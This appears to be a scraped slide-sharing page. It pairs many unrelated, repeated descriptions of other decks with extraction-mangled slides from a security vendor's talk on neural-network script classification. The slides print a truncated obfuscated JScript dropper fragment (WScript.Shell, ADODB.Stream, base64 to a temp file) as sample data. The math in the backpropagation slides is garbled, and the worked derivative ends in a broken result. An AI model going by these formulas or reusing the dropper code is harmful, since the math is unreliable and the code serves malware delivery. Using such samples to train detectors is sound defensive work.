An entry level sharing for trend micro scan engine team member. The sharing would take a binary classification on script type classification task as demonstrate. Topics would start from machine learning problem definition and covered computational graph for deep neural network (DNN), recurrent neural network, LSTM, GRU and some RNN fine tune tricks.
the slides are aimed to give a brief introductory base to Neural Networks and its architectures. it covers logistic regression, shallow neural networks and deep neural networks. the slides were presented in Deep Learning IndabaX Sudan.
Principle of Function Analysis - by Arun Umraossuserd6b1fd
This note explains about functions, type of function, their behaviour, conversion and derivation. This note is best for those who are going to study calculus or phys
Principle of Definite Integra - Integral Calculus - by Arun Umraossuserd6b1fd
Definite integral notes. Best for quick preparation. Easy to understand and colored graphics. Step by step description. Suitable for CBSE board and State Board students in Class XI & XII
Limit & Continuity of Functions - Differential Calculus by Arun Umraossuserd6b1fd
This books explains about limits and continuity and is base for derivative calculus. Suitable for CBSE Class XII students who are preparing for IIT JEE.
the slides are aimed to give a brief introductory base to Neural Networks and its architectures. it covers logistic regression, shallow neural networks and deep neural networks. the slides were presented in Deep Learning IndabaX Sudan.
Principle of Function Analysis - by Arun Umraossuserd6b1fd
This note explains about functions, type of function, their behaviour, conversion and derivation. This note is best for those who are going to study calculus or phys
Principle of Definite Integra - Integral Calculus - by Arun Umraossuserd6b1fd
Definite integral notes. Best for quick preparation. Easy to understand and colored graphics. Step by step description. Suitable for CBSE board and State Board students in Class XI & XII
Limit & Continuity of Functions - Differential Calculus by Arun Umraossuserd6b1fd
This books explains about limits and continuity and is base for derivative calculus. Suitable for CBSE Class XII students who are preparing for IIT JEE.
Deep Learning: Introduction & Chapter 5 Machine Learning BasicsJason Tsai
Given lecture for Deep Learning 101 study group with Frank Wu on Dec. 9th, 2016.
Reference: https://www.deeplearningbook.org/
Initiated by Taiwan AI Group (https://www.facebook.com/groups/Taiwan.AI.Group/)
Clojure is a new language that combines the power of Lisp with an existing hosted VM ecosystem (the Java VM). Clojure is a dynamically typed, functional, compiled language with performance on par with Java.
At the heart of all programming lies the need for abstraction, be it abstraction over our data or abstraction over the processes that operate upon it. Clojure provides a core set of powerful abstractions and ways to compose them. These abstractions are based in a heritage of Lisp but also cover many aspects of object-oriented programming as well.
This talk will examine these abstractions and introduce you to both Clojure and functional programming. Attendees are not expected to be familiar with either Clojure or FP.
https://telecombcn-dl.github.io/2018-dlai/
Deep learning technologies are at the core of the current revolution in artificial intelligence for multimedia data analysis. The convergence of large-scale annotated datasets and affordable GPU hardware has allowed the training of neural networks for data analysis tasks which were previously addressed with hand-crafted features. Architectures such as convolutional neural networks, recurrent neural networks or Q-nets for reinforcement learning have shaped a brand new scenario in signal processing. This course will cover the basic principles of deep learning from both an algorithmic and computational perspectives.
Deep Learning: Introduction & Chapter 5 Machine Learning BasicsJason Tsai
Given lecture for Deep Learning 101 study group with Frank Wu on Dec. 9th, 2016.
Reference: https://www.deeplearningbook.org/
Initiated by Taiwan AI Group (https://www.facebook.com/groups/Taiwan.AI.Group/)
Clojure is a new language that combines the power of Lisp with an existing hosted VM ecosystem (the Java VM). Clojure is a dynamically typed, functional, compiled language with performance on par with Java.
At the heart of all programming lies the need for abstraction, be it abstraction over our data or abstraction over the processes that operate upon it. Clojure provides a core set of powerful abstractions and ways to compose them. These abstractions are based in a heritage of Lisp but also cover many aspects of object-oriented programming as well.
This talk will examine these abstractions and introduce you to both Clojure and functional programming. Attendees are not expected to be familiar with either Clojure or FP.
https://telecombcn-dl.github.io/2018-dlai/
Deep learning technologies are at the core of the current revolution in artificial intelligence for multimedia data analysis. The convergence of large-scale annotated datasets and affordable GPU hardware has allowed the training of neural networks for data analysis tasks which were previously addressed with hand-crafted features. Architectures such as convolutional neural networks, recurrent neural networks or Q-nets for reinforcement learning have shaped a brand new scenario in signal processing. This course will cover the basic principles of deep learning from both an algorithmic and computational perspectives.
A fast-paced introduction to Deep Learning concepts, such as activation functions, cost functions, back propagation, and then a quick dive into CNNs. Basic knowledge of vectors, matrices, and derivatives is helpful in order to derive the maximum benefit from this session. Then we'll see a short introduction to TensorFlow and TensorBoard.
A fast-paced introduction to Deep Learning that starts with a simple yet complete neural network (no frameworks), followed by an overview of activation functions, cost functions, backpropagation, and then a quick dive into CNNs. Next we'll create a neural network using Keras, followed by an introduction to TensorFlow and TensorBoard. For best results, familiarity with basic vectors and matrices, inner (aka "dot") products of vectors, and rudimentary Python is definitely helpful.
Deep learning continues to push the state of the art in domains such as computer vision, natural language understanding and recommendation engines. One of the key reasons for this progress is the availability of highly flexible and developer friendly deep learning frameworks. During this workshop, members of the Amazon Machine Learning team will provide a short background on Deep Learning focusing on relevant application domains and an introduction to using the powerful and scalable Deep Learning framework, MXNet. At the end of this tutorial you’ll gain hands on experience targeting a variety of applications including computer vision and recommendation engines as well as exposure to how to use preconfigured Deep Learning AMIs and CloudFormation Templates to help speed your development.
https://telecombcn-dl.github.io/2017-dlai/
Deep learning technologies are at the core of the current revolution in artificial intelligence for multimedia data analysis. The convergence of large-scale annotated datasets and affordable GPU hardware has allowed the training of neural networks for data analysis tasks which were previously addressed with hand-crafted features. Architectures such as convolutional neural networks, recurrent neural networks or Q-nets for reinforcement learning have shaped a brand new scenario in signal processing. This course will cover the basic principles of deep learning from both an algorithmic and computational perspectives.
Intro to Deep Learning, TensorFlow, and tensorflow.jsOswald Campesato
This fast-paced session introduces Deep Learning concepts, such gradient descent, back propagation, activation functions, and CNNs. We'll look at creating Android apps with TensorFlow Lite (pending its availability). Basic knowledge of vectors, matrices, and Android, as well as elementary calculus (derivatives), are strongly recommended in order to derive the maximum benefit from this session.
An introduction to Deep Learning concepts, with a simple yet complete neural network, CNNs, followed by rudimentary concepts of Keras and TensorFlow, and some simple code fragments.
A fast-paced introduction to Deep Learning concepts, such as activation functions, cost functions, backpropagation, and then a quick dive into CNNs. Basic knowledge of vectors, matrices, and elementary calculus (derivatives), are helpful in order to derive the maximum benefit from this session.
Next we'll see a simple neural network using Keras, followed by an introduction to TensorFlow and TensorBoard. (Bonus points if you know Zorn's Lemma, the Well-Ordering Theorem, and the Axiom of Choice.)
A fast-paced introduction to Deep Learning (DL) concepts, such as neural networks, back propagation, activation functions, CNNs, RNNs (if time permits), and the CLT/AUT/fixed-point theorems, along with a basic code sample in TensorFlow.
During this session you will learn how to manually create a basic neural network that acts as a classifier, and also the segue from linear regression to a neural network.
You'll also learn about GANs (Generative Adversarial Networks) for static images as well as voice, and the former case, their potential impact on self-driving cars.
A fast-paced introduction to Deep Learning (DL) concepts, starting with a simple yet complete neural network (no frameworks), followed by aspects of deep neural networks, such as back propagation, activation functions, CNNs, and the AUT theorem. Next, a quick introduction to TensorFlow and TensorBoard, along with some code samples with TensorFlow. For best results, familiarity with basic vectors and matrices, inner (aka "dot") products of vectors, the notion of a derivative, and rudimentary Python is recommended.
Enhanced Enterprise Intelligence with your personal AI Data Copilot.pdfGetInData
Recently we have observed the rise of open-source Large Language Models (LLMs) that are community-driven or developed by the AI market leaders, such as Meta (Llama3), Databricks (DBRX) and Snowflake (Arctic). On the other hand, there is a growth in interest in specialized, carefully fine-tuned yet relatively small models that can efficiently assist programmers in day-to-day tasks. Finally, Retrieval-Augmented Generation (RAG) architectures have gained a lot of traction as the preferred approach for LLMs context and prompt augmentation for building conversational SQL data copilots, code copilots and chatbots.
In this presentation, we will show how we built upon these three concepts a robust Data Copilot that can help to democratize access to company data assets and boost performance of everyone working with data platforms.
Why do we need yet another (open-source ) Copilot?
How can we build one?
Architecture and evaluation
Analysis insight about a Flyball dog competition team's performanceroli9797
Insight of my analysis about a Flyball dog competition team's last year performance. Find more: https://github.com/rolandnagy-ds/flyball_race_analysis/tree/main
Global Situational Awareness of A.I. and where its headedvikram sood
You can see the future first in San Francisco.
Over the past year, the talk of the town has shifted from $10 billion compute clusters to $100 billion clusters to trillion-dollar clusters. Every six months another zero is added to the boardroom plans. Behind the scenes, there’s a fierce scramble to secure every power contract still available for the rest of the decade, every voltage transformer that can possibly be procured. American big business is gearing up to pour trillions of dollars into a long-unseen mobilization of American industrial might. By the end of the decade, American electricity production will have grown tens of percent; from the shale fields of Pennsylvania to the solar farms of Nevada, hundreds of millions of GPUs will hum.
The AGI race has begun. We are building machines that can think and reason. By 2025/26, these machines will outpace college graduates. By the end of the decade, they will be smarter than you or I; we will have superintelligence, in the true sense of the word. Along the way, national security forces not seen in half a century will be un-leashed, and before long, The Project will be on. If we’re lucky, we’ll be in an all-out race with the CCP; if we’re unlucky, an all-out war.
Everyone is now talking about AI, but few have the faintest glimmer of what is about to hit them. Nvidia analysts still think 2024 might be close to the peak. Mainstream pundits are stuck on the wilful blindness of “it’s just predicting the next word”. They see only hype and business-as-usual; at most they entertain another internet-scale technological change.
Before long, the world will wake up. But right now, there are perhaps a few hundred people, most of them in San Francisco and the AI labs, that have situational awareness. Through whatever peculiar forces of fate, I have found myself amongst them. A few years ago, these people were derided as crazy—but they trusted the trendlines, which allowed them to correctly predict the AI advances of the past few years. Whether these people are also right about the next few years remains to be seen. But these are very smart people—the smartest people I have ever met—and they are the ones building this technology. Perhaps they will be an odd footnote in history, or perhaps they will go down in history like Szilard and Oppenheimer and Teller. If they are seeing the future even close to correctly, we are in for a wild ride.
Let me tell you what we see.
ViewShift: Hassle-free Dynamic Policy Enforcement for Every Data LakeWalaa Eldin Moustafa
Dynamic policy enforcement is becoming an increasingly important topic in today’s world where data privacy and compliance is a top priority for companies, individuals, and regulators alike. In these slides, we discuss how LinkedIn implements a powerful dynamic policy enforcement engine, called ViewShift, and integrates it within its data lake. We show the query engine architecture and how catalog implementations can automatically route table resolutions to compliance-enforcing SQL views. Such views have a set of very interesting properties: (1) They are auto-generated from declarative data annotations. (2) They respect user-level consent and preferences (3) They are context-aware, encoding a different set of transformations for different use cases (4) They are portable; while the SQL logic is only implemented in one SQL dialect, it is accessible in all engines.
#SQL #Views #Privacy #Compliance #DataLake
Chatty Kathy - UNC Bootcamp Final Project Presentation - Final Version - 5.23...John Andrews
SlideShare Description for "Chatty Kathy - UNC Bootcamp Final Project Presentation"
Title: Chatty Kathy: Enhancing Physical Activity Among Older Adults
Description:
Discover how Chatty Kathy, an innovative project developed at the UNC Bootcamp, aims to tackle the challenge of low physical activity among older adults. Our AI-driven solution uses peer interaction to boost and sustain exercise levels, significantly improving health outcomes. This presentation covers our problem statement, the rationale behind Chatty Kathy, synthetic data and persona creation, model performance metrics, a visual demonstration of the project, and potential future developments. Join us for an insightful Q&A session to explore the potential of this groundbreaking project.
Project Team: Jay Requarth, Jana Avery, John Andrews, Dr. Dick Davis II, Nee Buntoum, Nam Yeongjin & Mat Nicholas
STATATHON: Unleashing the Power of Statistics in a 48-Hour Knowledge Extravag...sameer shah
"Join us for STATATHON, a dynamic 2-day event dedicated to exploring statistical knowledge and its real-world applications. From theory to practice, participants engage in intensive learning sessions, workshops, and challenges, fostering a deeper understanding of statistical methodologies and their significance in various fields."
Techniques to optimize the pagerank algorithm usually fall in two categories. One is to try reducing the work per iteration, and the other is to try reducing the number of iterations. These goals are often at odds with one another. Skipping computation on vertices which have already converged has the potential to save iteration time. Skipping in-identical vertices, with the same in-links, helps reduce duplicate computations and thus could help reduce iteration time. Road networks often have chains which can be short-circuited before pagerank computation to improve performance. Final ranks of chain nodes can be easily calculated. This could reduce both the iteration time, and the number of iterations. If a graph has no dangling nodes, pagerank of each strongly connected component can be computed in topological order. This could help reduce the iteration time, no. of iterations, and also enable multi-iteration concurrency in pagerank computation. The combination of all of the above methods is the STICD algorithm. [sticd] For dynamic graphs, unchanged components whose ranks are unaffected can be skipped altogether.
Unleashing the Power of Data_ Choosing a Trusted Analytics Platform.pdfEnterprise Wired
In this guide, we'll explore the key considerations and features to look for when choosing a Trusted analytics platform that meets your organization's needs and delivers actionable intelligence you can trust.
2. Outline
1. Problem Definition
2. Walk through RNN Model
3. How to tune best result
4. (optional) View Problem in CNN
5. (optional) A Sequence to Sequence Problem (Include HMM, CTC, Attention
4. #1 Problem Definition
1.Representation 2.Model 3.Evaluation
Define Problem
Sourcing Data
Cleaning
Normalization
Model Structure
Cost Function
Optimization
Metrics
Explanation
5. 1-1 Define Problem .. (more Task)
1.Representation
Define Problem
Sourcing Data
Cleaning
Normalization
.txt file
Sequence Learning:
- Turn to Pseudo Code
- Output Behavior Seq (without run)
- Summarize Code
- Learn When to Segment
Generative Model:
- Code Generation
- Code repatch
Supervised:
- Gen Hash Code Via Similarity
- Action to take (run sandbox or ..)
Unsupervised:
- Detect Unusual Coding Style
Reinforcement:
- Accroding PC statuc decide next
action
6. .txt file
.txt file
Text
1-1 Define Problem ..
1.Representation
Define Problem
Sourcing Data
Cleaning
Normalization
.txt file
JavaScript
7. 1-2 Sourcing Data
1.Representation
Define Problem
Sourcing Data
Cleaning
Normalization
Tim will share XDD
js
js
.txt file
js
Data Lake
Web
Benchmark
Dataset
John’s
Tool->
8. 1-2 Sourcing Data … Sampling Bias
Data Lake
(Trend Micro)
Web
Benchmark
Dataset
# of API used
#oflines
Valid JS script, but not in any bank
どっち ?
9. 1-3 Cleaning & Normalization
1.Representation
Define Problem
Sourcing Data
Cleaning
Normalization
.txt file
var evwfrEmu = new ActiveXObject("WScript.Shell");
//// 4fQei4pD7o69uOE8Trgp
YThMSpGKzmIcsQ =
evwfrEmu.ExpandEnvironmentStrings("%TEMP%")
+ "ssd" + Math.round(1e8 * Math.random());
var lmXPGbOCL0 = new
ActiveXObject("Msxml2.DOMDocument.6.0");
//// NN08kES93To
var MsslCA = new ActiveXObject("ADODB.Stream");
var dsgkpp = lmXPGbOCL0.createElement("tmp");
//// lZPifi9y
dsgkpp.dataType = "bin.base64";
//// wacLqE
//// bNloPOpvlZ8EdqKEn
MsslCA.Type = 1;
dsgkpp.text = "dmFyIGJUa3l
….
Source File
10. 1-3 Cleaning & Normalization
1.Representation
Define Problem
Sourcing Data
Cleaning
Normalization
.txt file
.txt file
var evwfrE
[23, 2, 19, 0, 6, 23, 24, 7, 19, 32]
Cleaned
Normalized
d = np.zeros((10, 98))
d[0,23] = 1
d[0,2] = 1
….
d[0,32] = 1
# data -> a sparse 2d matrix
11. 1-3 Cleaning & Normalization
1.Representation
Define Problem
Sourcing Data
Cleaning
Normalization
.txt file
( ) = (.js)< , , …., >
.txt file
Cleaning
Normalization
Raw Data
Cleaned Data
X y
js
Label ȳ
23. 2.1 Recall DNN, Model Structure
‘v’
‘a’
…
‘s’
…
‘E’
1
2
j
...... 1
2
i
......
1
Input Layer Hidden Layer Output Layer
Input Layer ∈ R 980x1
Hidden Layer ∈ R 4x1
Output Layer ∈ R 1x1
Verticles here are `Scalar`
Edges heare are `Operator`
24. 2.1 Recall DNN, Model Structure
1
2
j
......
1
2
i
......
1
Input Layer Hidden Layer Output Layer
Wij Zi
i = A(Zi
)
Zi
= Wi1
* +…+Wij
* + ....1 j
Input Layer : X ∈ R 980x1
Hidden Layer : a ∈ R 4x1
Output Layer : y ∈ R 1x1
Weighted : W ∈ R 4 x 980
Activation Func : A ∈ RxR
25. 2.1 Recall DNN, Model Structure
1
2
j
......
1
2
i
......
1
Input Layer Hidden Layer Output Layer
Wij Zi
a = A( X * W0
+ b0
)
Input Layer : X ∈ R980x1
Hidden Layer : a ∈ R4x1
Output Layer : y ∈ R1x1
Weighted : W0
∈R4x980
, W1
∈R1x4
bias : b0
∈R4x1
, b1
∈R1x1
Activation Func : A ∈ RxR
y = a * W1
+ b1
26. 2.1 Recall DNN, Model Structure = Inference
1
2
j
......
1
2
i
......
1
Input Layer Hidden Layer Output Layer
Wij Zi
a = A( X * W0
+ b0
)
y = a * W1
+ b1
if y > 0.5 : Javascript
else : TEXT
27. 2.1 Recall DNN, Model Structure = Inference
1
2
j
......
1
2
i
......
1
Input Layer Hidden Layer Output Layer
Wij Zi
( ) = (X; ) = y = (.js)
W0
∈ R 4x980
, W1
∈ R 1x4
b0
∈ R 4x1
, b1
∈ R 1x1
= { }
| | = total parameter
= 4*980 +4 +4 +1 = 3929
28. F(X) = (.js): Probability Distribution
(X; ): DNN Model
2.1 Recall DNN, Why it works ?
Neural Network = Function approximator
> Given enough variable, nn can approximate any continuous function
`Universal approximation theorem`
x^(2)+ ((5y)/(4)- sqrt(abs(x)))^(2)=1
approximate
29. 2.1 Recall DNN, Model Structure
Different NN structure: find a way to imporove learnability
Deep NN Recurrent NNConvolution NN Other Mincraft NN ..
1 2 1 2
30. 2.1 Recall DNN, Model Structure
Different NN structure: find a way to imporove learnability
Deep NN Deeper NN
31. 2.1 Recall DNN, Deeper Model Structure
1
2
j
......
1
2
i
......
Layer: L-1 Layer: L
Wij
L
Zi
L
i = ai
L
= A(Zi
L
)
Zi
L
= Wi1
L
* +…+Wij
L
* +
....
1 j
ai
L
= A(Wi1
L
* ai
L-1
+…+Wij
L
*ai
L-1
+...
32. 2.1 Recall DNN, Deeper Model Structure
1
2
j
......
1
2
i
......
Layer: L-1 Layer: L
Wij
L
Zi
L
= (X; )
= A( WL
…
A( W2
A( X * W1
+ b1
)+ b2
) …
+ bL
)
= { W1
, b1
, W2
, b2
, … , WL
, bL
}
pick the best model = best function
= best *
33. 2.1 Recall DNN, Deeper Model Structure
...
...
‘v’
‘a’
…
...
Input
Layer Hidden Layer
Output
Layer
...
...
...
R 980x1
R 1x1
fӨ
: R 980
➡R 1
Fully Connected Network
vectorize it !
34. a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
Output of a neuron:
ai
L
Output of one layer:
aL
: a vector
a0
L-1
a1
L-1
aj
L-1
a2
L
ai
L
Layer L
Neuron i
35. a0
L-1
a1
L-1
aj
L-1
a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
Weight:
Wij
L
a2
L
ai
L
Layer L-1 to Layer L
from neuron j in Layer L-1
to neuron i in Layer L
W L
=
W11
L
W12
L
….
W21
L
W22
L
….
NL
xNL-1
….
NL-1
NL
W L
36. a0
L-1
a1
L-1
aj
L-1
a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
Bias:
bi
L
a2
L
ai
L
bias for neuron i at Layer L
b L
=
b1
L
b2
L
bi
L
NL
….….
1
W L
37. a0
L-1
a1
L-1
aj
L-1
a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
a2
L
ai
L
1
W L
Zi
L
Input of a neuron:
zi
L
Input of one layer:
zL
: a vector
input of the activation
function for neuron i at layer l
38. a0
L-1
a1
L-1
aj
L-1
a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
a2
L
ai
L
1
W L
Zi
L
Input of a neuron:
zi
L input of the activation
function for neuron i at layer l
zi
L
= Wi1
L
a1
L-1
+Wi2
L
a2
L-1
+...+ bi
L
= ∑ Wij
L
aj
L-1
+ bi
Lj=1
NL-1
39. ….
a0
L-1
a1
L-1
aj
L-1
a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
a2
L
ai
L
1
W L
Zi
L
z1
L
= W11
L
a1
L-1
+W12
L
a2
L-1
+...+ b1
L
z2
L
= W21
L
a1
L-1
+W22
L
a2
L-1
+...+ b2
L
…
zi
L
= Wi1
L
a1
L-1
+Wi2
L
a2
L-1
+...+ bi
L
=
W11
L
W12
L
….
W21
L
W22
L
….
….
z1
L
z2
L
zi
L
NL
….
….
+
a1
L-1
a2
L-1
ai
L-1
….
….
b1
L
b2
L
bi
L
NL
….
NL
xNL-1
NL-1
40. ….
a0
L-1
a1
L-1
aj
L-1
a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
a2
L
ai
L
1
W L
Zi
L
=
W11
L
W12
L
….
W21
L
W22
L
….
….
z1
L
z2
L
zi
L
NL
….
….
+
a1
L-1
a2
L-1
ai
L-1
….
….
b1
L
b2
L
bi
L
NL
….
NL
xNL-1
NL-1
z L
= W L
a L-1
+ b L
41. ….
a0
L-1
a1
L-1
aj
L-1
a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
a2
L
ai
L
1
W L
Zi
L
=
a1
L
a2
L
ai
L
NL
….
ai
L
=A(zi
L
)
….
A(z1
L
)
A(z2
L
)
A(zi
L
)
NL
….
Relations between Layers and Output
a L
=A(z L
) : vector
42. a0
L-1
a1
L-1
aj
L-1
a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
a2
L
ai
L
1
W L
Zi
L
z L
= W L
a L-1
+ b L
, a L
=A(z L
)
a L
=A(W L
a L-1
+ b L
)
z L
a La L-1
W L b L Computational Graph
Node: Tensor
Edge: Operator
43. a0
L-1
a1
L-1
aj
L-1
a1
L
2.1 Recall DNN, Deeper Model Structure (vector)
1
2
j
......
1
2
i
......
Layer L-1
NL-1
Nodes
Layer L
NL
Nodes
a2
L
ai
L
1
W L
Zi
L
z L
= W L
a L-1
+ b L
, a L
=A(z L
)
a L
=A(W L
a L-1
+ b L
)
z L
a La L-1
W L
b L
Computational Graph
Node: Tensor
Edge: Operator
44. 2.1 Recall DNN, Deeper Model Structure
...
...
‘v’
‘a’
…
...
...
...
... fӨ
: R 980
➡R 1
Input Layer 1 Layer 2 Layer L Output
W 1
, b 1
W 2
, b 2
W L
, b L
= (X; ) = A( WL
… A( W2
A( X * W1
+ b1
)+ b2
) … + bL
)
45. 2.1 Recall DNN, Deeper Model Structure
= (X; ) = A( WL
… A( W2
A( X*W1
+ b1
)+ b2
) … + bL
)
z 1
a 1
W1
b1
z 2 a L-1
W2
b2
z L
….
Computational Graph
Node: Tensor
Edge: Operator
W L
b L
46. 2.1 Recall DNN, Deeper Model Structure
1
2
j
......
1
2
i
......
Layer: L-1 Layer: L
Wij
L
Zi
L
= (X; )
= A( WL
…
A( W2
A( X * W1
+ b1
) + b2
) …
+ bL
)
= { W1
, b1
, W2
, b2
, … , WL
, bL
}
pick the best model = best function
= best *
47. 2.1 Recall DNN, Deeper Model Structure
= (X; )
= A( WL
…
A( W2
A( X * W1
+ b1
) + b2
) …
+ bL
)
= { W1
, b1
, W2
, b2
, … , WL
, bL
}
pick the best model = best function
= best *
2.Model
Model Structure
Cost Function
Optimization
functions set
48. 2.1 Recall DNN, Cost Function
Cost Function: C( )
- How bad the parameter is
- also called `loss/ error function`
Object Function: O( )
- How good the parameter is
2.Model
Model Structure
Cost Function
Optimization
49. 2.1 Recall DNN, Cost Function
Cost Function: C( )
- How bad the parameter is
- also called `loss/ error function`
Best Parameter: *
*
= arg min C( )
2.Model
Model Structure
Cost Function
Optimization
50. 2.1 Recall DNN, Cost Function
Cost Function: C( )
- How bad the parameter is
- also called `loss/ error function`
F(X) = (.js): Probability Distribution (X; ): DNN Model
distance ( , )
51. 2.1 Recall DNN, Cost Function
Cost Function: C( )
- How bad the parameter is
- also called `loss/ error function`
F(X) = (.js): Probability Distribution (X; ): DNN Model
distance ( , )
Don’t actually know the
real distribution function
52. 2.1 Recall DNN, Cost Function
X
Real Probability Distribution
Dataset Sampling
From Real World
(X1
, ȳ1
), (X2
, ȳ2
), (X3
, ȳ3
) …
X1
ȳ1
1
C( ) = ∑ loss ( k
, ȳk
)
= ∑ ( )
1
k
k
Machine Learning Model
1
k
k
Wrong Content !!
Classification and Regression is not going to learn a probability distribution
53. Dataset Sampling
From Real World
2.1 Recall DNN, Cost Function
Real Probability Distribution ?
ȳ1
=1
1
C( ) = ∑ loss ( k
, ȳk
)
1
k
k
1
0
ȳ2
=0
.txt
file
js
.txt
file
js
Machine Learning Model
X
(X1
, ȳ1
), (X2
, ȳ2
), (X3
, ȳ3
) …
X1
Wrong Content !!
Classification and Regression is not going to learn a probability distribution
54. Dataset Sampling
From Real World
2.1 Recall DNN, Cost Function, MSE as loss
Real Probability Distribution ?
ȳ1
=1
1
C( ) = ∑ loss ( k
, ȳk
)
1
k
k
1
0
ȳ2
=0
= ∑ ॥ k
- ȳk
॥
1
k
k
.txt
file
js
.txt
file
js
Machine Learning Model
X
(X1
, ȳ1
), (X2
, ȳ2
), (X3
, ȳ3
) …
X1
Wrong Content !!
Classification and Regression is not going to learn a probability distribution
55. Dataset Sampling
From Real World
2.1 Recall DNN, Cost Function, Cross Ent. as loss
Real Probability Distribution ?
Machine Learning Model
ȳ1
=1
1
C( ) = ∑ loss ( k
, ȳk
)
1
k
k
1
0
ȳ2
=0
C( )= ∑( k
ln( ȳk
)+(1- k
)ln(1- ȳk
))
-1
k
k
.txt
file
js
.txt
file
js
X
(X1
, ȳ1
), (X2
, ȳ2
), (X3
, ȳ3
) …
X1
Wrong Content !!
Classification and Regression is not going to learn a probability distribution
56. 2.1 Recall DNN, Cost Function, MSE as loss
C( ) = ∑ loss ( k
, ȳk
)
1
k
k
Accuracy
MSE
Logistic Loss
Hinge Loss
loss(k
*ȳk
)
To Visualize the differnet of cost function
Φ( k
* ȳk
) ⬅ loss ( k
, ȳk
)
k
* ȳk
, ȳk
∈ {-1, 1}
z=yy^
Acc: L(z)=(sign(z)+1)/2L(z)=(sign(z)+1)/2
Logistic: L(z)=log(exp(−x)+1)/log(2)
MSE: L(z)=(y−y^)2=(y2−y(^y))2=(1−z)2
58. 2.1 Recall DNN, Optimization
Find the Best function
, model parameter
loss,C()
For simplification, consider
that has only one variable
1. Randomly start at 0
2. Compute dC( 0
) / d( )
3. 1
⬅ 0
- η * dC( 0
) / d( )
4. Compute dC( 1
) / d( )
5. 2
⬅ 1
- η * dC( 1
) / d( )
..
0 1
dC( 0
)
d( )
dC( 1
)
d( )
η is learning rate
59. 2.1 Recall DNN, Optimization
set the learning rate carefully
η is learning rate
For simplification, consider
that has only one variable
1. Randomly start at 0
2. Compute dC( 0
) / d( )
3. 1
⬅ 0
- η * dC( 0
) / d( )
4. Compute dC( 1
) / d( )
5. 2
⬅ 1
- η * dC( 1
) / d( )
..
Copy from http://speech.ee.ntu.edu.tw/~tlkagk/courses/MLDS_2015_2/Lecture/DNN%20(v4).pdf
60. 2
1
0
2.1 Recall DNN, Optimization
Find the Best function
1
2
Suppose that has two variable
1. Randomly start at 0
=
2. Compute the gradient of C( ) at 0
C( 0
) =
3. update parameter ..
⬅ - η *
….
….
1
0
2
0
∂C( 0
) / ∂ 1
∂C( 0
) / ∂ 2
∂C( 0
) / ∂ 1
∂C( 0
) / ∂ 2
1
0
2
0
1
1
2
1
Gradient
Movement
C( )
61. 2.1 Recall DNN, Optimization
1
2
j
......
1
2
i
......
Layer: L-1 Layer: L
Wij
L
Zi
L
Optimize out model
1. Randomly start at 0
2. Compute the gradient of C( ) at 0
: C( 0
)
3. update parameter: 1
⬅ 0
- η * C( 0
)
To Calculate C( 0
), we need
{ ∂C( 0
)/∂W11
1
, ∂C( 0
)/∂b1
1
,
∂C( 0
)/∂W12
1
, ∂C( 0
)/∂b2
1
,
… ,
∂C( 0
)/∂Wij
L
, ∂C( 0
)/∂bi
L
}
62. 2.1 Recall DNN, Diff on Computational Graph
x zy
z = f(x), y = g(x), z = h(y)
dz/dx = dy/dx * dz/dy
h()g()
s z
t
h()
g()
u
k() z = f(s), t=g(s), u=h(s), z = k(t,u)
dz/ds = ∂t/∂s * ∂z/∂t + ∂u/∂s * ∂z/∂u
63. **
exp()
2.1 Recall DNN, Diff on Computational Graph
Example: y = x * exp( x*x ) : u = x*x, v = exp(u), w = x*v
x v
x
u w
x
64. **
exp()
2.1 Recall DNN, Diff on Computational Graph
Example: y = x * exp( x*x ) : u = x*x, v = exp(u), w = x*v
x v
x
u w
x
x = 2, y?
2
2 2
4 e^4 2*e^4
y = 2*e^4
Forward Pass
65. **
exp()
2.1 Recall DNN, Diff on Computational Graph
Example: y = x * exp( x*x ) : u = x*x, v = exp(u), w = x*v
x v
x
u w
x
dy/dx|x=2
?
2
2 2
4 e^4 2*e^4
Backward Pass
∂u/∂s=exp(u)
= exp(x^2)
∂y/∂v=x
∂w/∂x=v=exp(u)=exp(x^2)
∂u/∂x=x
∂u/∂x=x
WARNING: Different X
66. ∂u/∂x=x
∂u/∂s=exp(u)
= exp(x^2)
∂y/∂v=x
**
exp()
2.1 Recall DNN, Diff on Computational Graph
Example: y = x * exp( x*x ) : u = x*x, v = exp(u), w = x*v
x v
x
u w
x
dy/dx|x=2
?
2
2 2
4 e^4 2*e^4
Backward Pass
∂w/∂x=v=exp(u)=exp(x^2)
∂u/∂x=x
∂y/∂x=x*exp(x^2)*x
67. ∂u/∂x=x
∂u/∂s=exp(u)
= exp(x^2)
∂y/∂v=x
**
exp()
2.1 Recall DNN, Diff on Computational Graph
Example: y = x * exp( x*x ) : u = x*x, v = exp(u), w = x*v
x v
x
u w
x
dy/dx|x=2
?
2
2 2
4 e^4 2*e^4
Backward Pass
∂u/∂x=x
∂y/∂x=x*exp(x^2)*x
∂y/∂x=x*exp(x^2)*x
∂w/∂x=v=exp(u)=exp(x^2)
68. ∂u/∂x=x
∂u/∂s=exp(u)
= exp(x^2)
∂y/∂v=x
**
exp()
2.1 Recall DNN, Diff on Computational Graph
Example: y = x * exp( x*x ) : u = x*x, v = exp(u), w = x*v
x v
x
u w
x
dy/dx|x=2
?
2
2 2
4 e^4 2*e^4
Backward Pass
∂u/∂x=x
∂y/∂x=x*exp(x^2)*x
∂y/∂x=x*exp(x^2)*x
= 2*x2
